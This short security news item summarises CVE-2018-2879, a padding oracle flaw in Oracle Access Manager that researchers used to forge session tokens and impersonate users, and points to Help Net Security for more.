A padding oracle vulnerability in Oracle Access Manager (CVE-2018-2879) can be exploited by attackers to bypass authentication and impersonate any user account.
The vulnerability arises from a flawed cryptographic format used by the OAM.
How One AI-Driven Media Platform Cut EBS Costs for AWS ASGs by 48%
The vulnerability can be exploited to decrypt and encrypt messages used to communicate between the OAM and web servers. The researchers have managed to construct a valid session token and encrypt it, then pass it off as valid to the web server. This allowed them to access protected resources as a user already known to the OAM.
Read more: Help Net Security